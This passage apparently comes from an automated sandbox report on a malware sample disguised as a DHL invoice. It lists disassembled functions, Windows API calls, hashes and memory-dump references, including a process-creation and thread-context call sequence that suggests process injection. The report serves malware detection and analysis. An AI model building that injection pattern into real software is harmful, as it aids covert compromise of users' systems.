                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 146820519-0
                                                                                                                        • Opcode ID: e15b59811998df91088896bc162395aca80f65b651ce87130c8978763358067e
                                                                                                                        • Instruction ID: 3a896c4514587f31c0b4f08776c4583dddfbb521181d92dc92159fed1383f1fd
                                                                                                                        • Opcode Fuzzy Hash: e15b59811998df91088896bc162395aca80f65b651ce87130c8978763358067e
                                                                                                                        • Instruction Fuzzy Hash: 25127A71A083019FC725DF28C480B6ABBE9FF85318F05895DE9898B252CB31ED45CF92
                                                                                                                        Function 0039C161 Relevance: 4.6, APIs: 3, Instructions: 74timewindowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00333923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00333A04
                                                                                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0039C259
                                                                                                                        • KillTimer.USER32(?,00000001,?,?), ref: 0039C261
                                                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0039C270
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: IconNotifyShell_Timer$Kill
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3500052701-0
                                                                                                                        • Opcode ID: 1186b015f4c8101f86d9f70acc619c046b934b965363ec97b03a024522975d2c
                                                                                                                        • Instruction ID: f501f514ba9d15956b2309e14eec5f6c30ae6b5908bff72904b0838d36a26280
                                                                                                                        • Opcode Fuzzy Hash: 1186b015f4c8101f86d9f70acc619c046b934b965363ec97b03a024522975d2c
                                                                                                                        • Instruction Fuzzy Hash: 49319370914384AFEF239F748895BE7BBEC9B06308F00549AD5DEA7242C7746A84CB51
                                                                                                                        Function 003686AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CloseHandle.KERNELBASE(00000000,00000000,?,?,003685CC,?,003F8CC8,0000000C), ref: 00368704
                                                                                                                        • GetLastError.KERNEL32(?,003685CC,?,003F8CC8,0000000C), ref: 0036870E
                                                                                                                        • __dosmaperr.LIBCMT ref: 00368739
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2583163307-0
                                                                                                                        • Opcode ID: 61f2ce76636dd31cb1fcf53a544ce68eed9ee0d803907d3f1b08d6e1026cc603
                                                                                                                        • Instruction ID: a2b4e3e7df233c8b0465204e4b387440af621f5b20cbdd3e326e6f18be729549
                                                                                                                        • Opcode Fuzzy Hash: 61f2ce76636dd31cb1fcf53a544ce68eed9ee0d803907d3f1b08d6e1026cc603
                                                                                                                        • Instruction Fuzzy Hash: B4018E3670426016C2336334E845B7E27494B8BB74F3A8329FA48DF1DADEF0CC818250
                                                                                                                        Function 0033DB38 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • TranslateMessage.USER32(?), ref: 0033DB7B
                                                                                                                        • DispatchMessageW.USER32(?), ref: 0033DB89
                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0033DB9F
                                                                                                                        • Sleep.KERNEL32(0000000A), ref: 0033DBB1
                                                                                                                        • TranslateAcceleratorW.USER32(?,?,?), ref: 00381CC9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3288985973-0
                                                                                                                        • Opcode ID: 4fcb0fa75210ea9e720969d2de37a8a38b45d3aa89a825fd3d861e60101c3c77
                                                                                                                        • Instruction ID: 94d8598ffc70b269193b86f96febae4f111113703800d0c376121c59deac4ff4
                                                                                                                        • Opcode Fuzzy Hash: 4fcb0fa75210ea9e720969d2de37a8a38b45d3aa89a825fd3d861e60101c3c77
                                                                                                                        • Instruction Fuzzy Hash: 6CF05E316443409BEB31DB60DC89FEA73BCEB45310F104929E64AD70D0DB30A4888B15
                                                                                                                        Function 003A2FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,003A2CD4,?,?,?,00000004,00000001), ref: 003A2FF2
                                                                                                                        • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,003A2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 003A3006
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,003A2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 003A300D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$CloseCreateHandleTime
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3397143404-0
                                                                                                                        • Opcode ID: d5ad2f44b97b6dba5cd4c0725a099c264bd6158bce1d0b955faacb455dd10194
                                                                                                                        • Instruction ID: 2731eb235f02f3286c871147dbc2bb7cf1085d7f5f6e35376e24fceab50151df
                                                                                                                        • Opcode Fuzzy Hash: d5ad2f44b97b6dba5cd4c0725a099c264bd6158bce1d0b955faacb455dd10194
                                                                                                                        • Instruction Fuzzy Hash: 38E0863669021077D2321756BC0DF8B3A1CD786B71F154210F71DB50D146A0250143A8
                                                                                                                        Function 00341310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 003417F6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Init_thread_footer
                                                                                                                        • String ID: CALL
                                                                                                                        • API String ID: 1385522511-4196123274
                                                                                                                        • Opcode ID: b736c3c8c7b16c942a501234dff9a0fee5811f171c33a70650913be865423643
                                                                                                                        • Instruction ID: 0c4493dd2c02044e91d7adeffcaff305e385cc106de173f2bb794c109a3ffa45
                                                                                                                        • Opcode Fuzzy Hash: b736c3c8c7b16c942a501234dff9a0fee5811f171c33a70650913be865423643
                                                                                                                        • Instruction Fuzzy Hash: A12299706087019FC716DF24C485A2ABBF5BF86314F19896DF4968F3A2D771E981CB82
                                                                                                                        Function 003A6EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _wcslen.LIBCMT ref: 003A6F6B
                                                                                                                          • Part of subcall function 00334ECB: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00401418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00334EFD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad_wcslen
                                                                                                                        • String ID: >>>AUTOIT SCRIPT<<<
                                                                                                                        • API String ID: 3312870042-2806939583
                                                                                                                        • Opcode ID: d391c0595f6c43223fb7fe85ef0137c33a2614d8c0752dd6fbe921b644e8d65d
                                                                                                                        • Instruction ID: def1bafe95dff2ef6243fb6a76572b3ccf07bf886dbca26466bca3123bd4342d
                                                                                                                        • Opcode Fuzzy Hash: d391c0595f6c43223fb7fe85ef0137c33a2614d8c0752dd6fbe921b644e8d65d
                                                                                                                        • Instruction Fuzzy Hash: B8B1A3711082019FCB16EF20C8D29AEB7E5FF95310F05895DF4969B262EB30ED49CB92
                                                                                                                        Function 003A2557 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __fread_nolock
                                                                                                                        • String ID: EA06
                                                                                                                        • API String ID: 2638373210-3962188686
                                                                                                                        • Opcode ID: 55dc342fef1a00a0e62fcc508d4580008322d0a78f854d67f1db545de9ef8d0f
                                                                                                                        • Instruction ID: b4c9829d7f889ad8f2d758b4f110d4e2e0ee5193b592c363e6d19ccdc13cd873
                                                                                                                        • Opcode Fuzzy Hash: 55dc342fef1a00a0e62fcc508d4580008322d0a78f854d67f1db545de9ef8d0f
                                                                                                                        • Instruction Fuzzy Hash: EA01B572D042587EDF19C7A8C856EEEBBF8DB06301F00455AE552D6181E5B4E7088B60
                                                                                                                        Function 00333837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00333908
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: IconNotifyShell_
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1144537725-0
                                                                                                                        • Opcode ID: d312053ae5730140307571533326e806e20c96b5403e19dffbaaca28ade1520c
                                                                                                                        • Instruction ID: 3080656ad5565d2ac70d2338e629ff9f9e998a75302f362eafc4aaa90d3c813a
                                                                                                                        • Opcode Fuzzy Hash: d312053ae5730140307571533326e806e20c96b5403e19dffbaaca28ade1520c
                                                                                                                        • Instruction Fuzzy Hash: 18319170504301DFE722DF24D9C4B97BBE8FB49709F00492EF99997290E771AA48CB92
                                                                                                                        Function 00EADFA5 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 00EAE7D5
                                                                                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00EAE7F9
                                                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00EAE81B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2053537403.0000000000EAC000.00000040.00000020.00020000.00000000.sdmp, Offset: 00EAC000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_eac000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2438371351-0
                                                                                                                        • Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                                                                        • Instruction ID: 665fc857496c911c292472b585955e9e61f1fa7fe701bb8bbfdca12e89852e78
                                                                                                                        • Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                                                                        • Instruction Fuzzy Hash: FE12CF24E14658C6EB24DF64D8507DEB232EF68300F10A0E9910DEB7A5E77A5F81CF5A
                                                                                                                        Function 0034FC70 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 544645111-0
                                                                                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                        • Instruction ID: 0e839e2b70041ca2eb664bb653471b892590581f663469870598ae1defca1f80
                                                                                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                        • Instruction Fuzzy Hash: 8531C175A001099FC71ADF59D4C0A69FBE5FB4A300B2986A5E80ACF65AD731EDC1CBD0
                                                                                                                        Function 00334ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00334E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00334EDD,?,00401418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00334E9C
                                                                                                                          • Part of subcall function 00334E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00334EAE
                                                                                                                          • Part of subcall function 00334E90: FreeLibrary.KERNEL32(00000000,?,?,00334EDD,?,00401418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00334EC0
                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00401418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00334EFD
                                                                                                                          • Part of subcall function 00334E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00373CDE,?,00401418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00334E62
                                                                                                                          • Part of subcall function 00334E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00334E74
                                                                                                                          • Part of subcall function 00334E59: FreeLibrary.KERNEL32(00000000,?,?,00373CDE,?,00401418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00334E87
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$Load$AddressFreeProc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2632591731-0
                                                                                                                        • Opcode ID: de45ad6af31cff585563085285b18c95f600ff095d531270b91b88ba71834ca8
                                                                                                                        • Instruction ID: 0635c3e311656b1488d22117a5f7a59262ce1c8608b7c0a4e73c05c02d53b189
                                                                                                                        • Opcode Fuzzy Hash: de45ad6af31cff585563085285b18c95f600ff095d531270b91b88ba71834ca8
                                                                                                                        • Instruction Fuzzy Hash: 5E112332610205AACF27AB64DC82FAD77A9AF40B11F14842DF442AE1C1EE74EE059B50
                                                                                                                        Function 00368402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __wsopen_s
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3347428461-0
                                                                                                                        • Opcode ID: d9b70949f49baccbceb95f83bd8e835c0453960d5decb2a1f572dbd9580bdd68
                                                                                                                        • Instruction ID: e03b1860b14c75a4dd8915eefb821daf6a789162ff952bc16afb23bb39350094
                                                                                                                        • Opcode Fuzzy Hash: d9b70949f49baccbceb95f83bd8e835c0453960d5decb2a1f572dbd9580bdd68
                                                                                                                        • Instruction Fuzzy Hash: B8115E7190410AAFCF06DF58E94099E7BF4EF48300F118159FC08AB311DB30DA11CB64
                                                                                                                        Function 00365000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00364C7D: RtlAllocateHeap.NTDLL(00000008,00331129,00000000,?,00362E29,00000001,00000364,?,?,?,0035F2DE,00363863,00401444,?,0034FDF5,?), ref: 00364CBE
                                                                                                                        • _free.LIBCMT ref: 0036506C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap_free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 614378929-0
                                                                                                                        • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                                                                        • Instruction ID: 0db2f4090693b0787ded5eb7a6b2c2d634521ed33134f84736b05a5367fc33ed
                                                                                                                        • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                                                                        • Instruction Fuzzy Hash: 930149726047056BE3328F65D885A9AFBECFB89370F26452DF184872C0EB30A805C7B4
                                                                                                                        Function 0035E602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                                                        • Instruction ID: b30988700cf2b9736134b6dfb1a057069fffd976fc13dbb9fb189879be87ecf1
                                                                                                                        • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                                                        • Instruction Fuzzy Hash: 43F0F432510A10AAC7373A69DC05F5B339D9F523B3F114B15FC219A1E2CB74D90A86E5
                                                                                                                        Function 00364C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RtlAllocateHeap.NTDLL(00000008,00331129,00000000,?,00362E29,00000001,00000364,?,?,?,0035F2DE,00363863,00401444,?,0034FDF5,?), ref: 00364CBE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1279760036-0
